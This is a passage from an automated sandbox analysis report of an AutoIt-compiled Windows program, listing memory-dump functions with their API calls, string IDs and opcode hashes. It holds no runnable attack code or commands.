                                                                                                                                • Part of subcall function 0017CAEE: _memmove.LIBCMT ref: 0017CB2F
                                                                                                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 001AC4E1
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend_memmove
                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                              • API String ID: 1456604079-1403004172
                                                                                                                              • Opcode ID: 0bc6c9a9df3b26a1348d853181e14267c4e1a33d552b49cbac2ab1440a6ec7c2
                                                                                                                              • Instruction ID: 0f25b857e71e030bfce06a2c36f5e9dc77f868779ca32a55086a6c420e592c25
                                                                                                                              • Opcode Fuzzy Hash: 0bc6c9a9df3b26a1348d853181e14267c4e1a33d552b49cbac2ab1440a6ec7c2
                                                                                                                              • Instruction Fuzzy Hash: 66018F75641108BBCB09EBA4C963AFF73AD9F2A701F144029E502E31C1EB545E0896A5
                                                                                                                              Function 001AC4F6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0017CAEE: _memmove.LIBCMT ref: 0017CB2F
                                                                                                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 001AC562
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend_memmove
                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                              • API String ID: 1456604079-1403004172
                                                                                                                              • Opcode ID: eebb7af6bbc5f306b0bf05564c3296221f057b699813ac5d7c1d5020956e678b
                                                                                                                              • Instruction ID: 4777675bc6d72959d2b8502a8cd659590f46a3d629be61cb88d352e40e9544c2
                                                                                                                              • Opcode Fuzzy Hash: eebb7af6bbc5f306b0bf05564c3296221f057b699813ac5d7c1d5020956e678b
                                                                                                                              • Instruction Fuzzy Hash: E401AD75A41108BBCB05EBA8C952EFF73ADAF26701F144025F407F3181EB65AE0996A1
                                                                                                                              Function 001B804C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ClassName_wcscmp
                                                                                                                              • String ID: #32770
                                                                                                                              • API String ID: 2292705959-463685578
                                                                                                                              • Opcode ID: 8dcbd4f08e20eaafa4f74fa8d9a0438d4f530e0ec450cf64d9bcd4b886fe0ab4
                                                                                                                              • Instruction ID: d3184c6de832652dc6803985c8c5836a9af111ba2f13e0a0303d38ddcb117e9f
                                                                                                                              • Opcode Fuzzy Hash: 8dcbd4f08e20eaafa4f74fa8d9a0438d4f530e0ec450cf64d9bcd4b886fe0ab4
                                                                                                                              • Instruction Fuzzy Hash: 9CE0D83360022937D720EBA5AC0AEE7FBADFB51BA4F000026F914E3041DB749645C7D4
                                                                                                                              Function 001AB35D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 001AB36B
                                                                                                                                • Part of subcall function 00192011: _doexit.LIBCMT ref: 0019201B
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Message_doexit
                                                                                                                              • String ID: AutoIt$Error allocating memory.
                                                                                                                              • API String ID: 1993061046-4017498283
                                                                                                                              • Opcode ID: 46d443c6e6c64ddf9acde47e0867dc8668f3f6207ad3d6708de109f3630bff04
                                                                                                                              • Instruction ID: fab7f216a45dbe46809146f001dbea992dabc08e86ab596f4096a9e133a07bd5
                                                                                                                              • Opcode Fuzzy Hash: 46d443c6e6c64ddf9acde47e0867dc8668f3f6207ad3d6708de109f3630bff04
                                                                                                                              • Instruction Fuzzy Hash: E6D05B3138935833D61536E47C17FD576885F16B51F154025FF0C955C38BD2D5D091D9
                                                                                                                              Function 001EBC74 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetSystemDirectoryW.KERNEL32(?), ref: 001EBAB8
                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 001EBCAB
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DirectoryFreeLibrarySystem
                                                                                                                              • String ID: WIN_XPe
                                                                                                                              • API String ID: 510247158-3257408948
                                                                                                                              • Opcode ID: 99ef01522306b8e821f47802f3824d8a3be6cd3cae8ccba3666f18cdb270a6a8
                                                                                                                              • Instruction ID: b130ec10f7c863ca5b32b33e321249366fc8b216c2b0ad0cc06a0386883ae9b0
                                                                                                                              • Opcode Fuzzy Hash: 99ef01522306b8e821f47802f3824d8a3be6cd3cae8ccba3666f18cdb270a6a8
                                                                                                                              • Instruction Fuzzy Hash: 82E0C970C0854DEFCF19DBA9E8CAAEDB7B9BB58300F158896E022B3050C7719A44DF21
                                                                                                                              Function 001D8495 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001D849F
                                                                                                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 001D84B2
                                                                                                                                • Part of subcall function 001B8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 001B83CD
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FindMessagePostSleepWindow
                                                                                                                              • String ID: Shell_TrayWnd
                                                                                                                              • API String ID: 529655941-2988720461
                                                                                                                              • Opcode ID: 778cf1de034c3ffbb96d92563133918022ebb631b27c72d96ccf48b5b406918f
                                                                                                                              • Instruction ID: 4d27195a3d3a425eeafb2c5ea0813008fe77851ff615bf1e871cc79f38ed57c5
                                                                                                                              • Opcode Fuzzy Hash: 778cf1de034c3ffbb96d92563133918022ebb631b27c72d96ccf48b5b406918f
                                                                                                                              • Instruction Fuzzy Hash: 77D0C972394314B7E764A770AC4BFF66A59AB24B11F050929B349AA5D0CAA4B840C664
                                                                                                                              Function 001D84C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001D84DF
                                                                                                                              • PostMessageW.USER32(00000000), ref: 001D84E6
                                                                                                                                • Part of subcall function 001B8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 001B83CD
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FindMessagePostSleepWindow
                                                                                                                              • String ID: Shell_TrayWnd
                                                                                                                              • API String ID: 529655941-2988720461
                                                                                                                              • Opcode ID: 47d80bd2e68ad23322fbb6a1432fbd945e97112a65b31d04800ac370a3f2c0e8
                                                                                                                              • Instruction ID: 039f07be4ecdc685b988010cacb4ef25f4cdbe57e2ccaf39566bbc78a65be112
                                                                                                                              • Opcode Fuzzy Hash: 47d80bd2e68ad23322fbb6a1432fbd945e97112a65b31d04800ac370a3f2c0e8
                                                                                                                              • Instruction Fuzzy Hash: E6D0A9323803107BE720A370AC0BFE66648AB28B11F000928B309AA1D0CAA0B800C624
                                                                                                                              Function 001BD009 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 001BD01E
                                                                                                                              • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 001BD035
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Temp$FileNamePath
                                                                                                                              • String ID: aut
                                                                                                                              • API String ID: 3285503233-3010740371
                                                                                                                              • Opcode ID: f781b5f02faa7251ab1abba640025bcf13c239cb1cb39ab543ccb35c019b2ef3
                                                                                                                              • Instruction ID: ea0f019b8f027b4aa73e3a2c6861c525891fa131d9ad932bafdd6afc793eea94
                                                                                                                              • Opcode Fuzzy Hash: f781b5f02faa7251ab1abba640025bcf13c239cb1cb39ab543ccb35c019b2ef3
                                                                                                                              • Instruction Fuzzy Hash: 41D05EB154030EBBDB10ABA0FD0EFB9776CA700704F1041907614D10D1D6B4D695CBA0